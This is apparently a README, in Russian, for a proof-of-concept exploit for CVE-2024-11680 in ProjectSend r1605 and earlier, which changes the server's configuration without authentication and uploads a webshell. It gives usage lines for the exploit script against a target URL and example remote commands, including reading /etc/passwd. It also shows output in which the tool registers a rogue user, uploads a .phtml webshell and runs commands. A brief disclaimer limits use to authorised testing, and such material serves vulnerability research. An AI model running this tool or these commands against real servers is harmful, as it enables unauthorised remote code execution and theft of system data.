
Этот репозиторий содержит эксплойт proof-of-concept (PoC) для CVE-2024-11680 — критической уязвимости в ProjectSend r1605 и более ранних версиях. Эксплойт нацелен на некорректную аутентификацию, вызванную проблемами с неверными настройками привилегий, а также на внедрение команд.
Это PoC-эксплойт для CVE-2024-11680 — уязвимости неаутентифицированного изменения конфигурации и загрузки веб-шелла в ProjectSend.
Эксплойт использует несколько уязвимостей в ProjectSend:
pip install requests colorama
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
-u, --url: целевой URL (например, http://target.com/projectsend)-c, --command: команда для выполнения на цели (по умолчанию: id)# Get Python version
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# List directory contents
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# Get system information
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# Read passwd file
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, на тестирование которых у вас есть явное разрешение.
[+] Target is vulnerable
[+] Insecure options enabled
[+] User registered successfully.
[+] New username: NoDLQWYF
[+] New password: X02A3g9LuN4S
[+] File uploaded: kLoISqdA.phtml
[+] File accessible at: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Command Output:
Python 3.9.2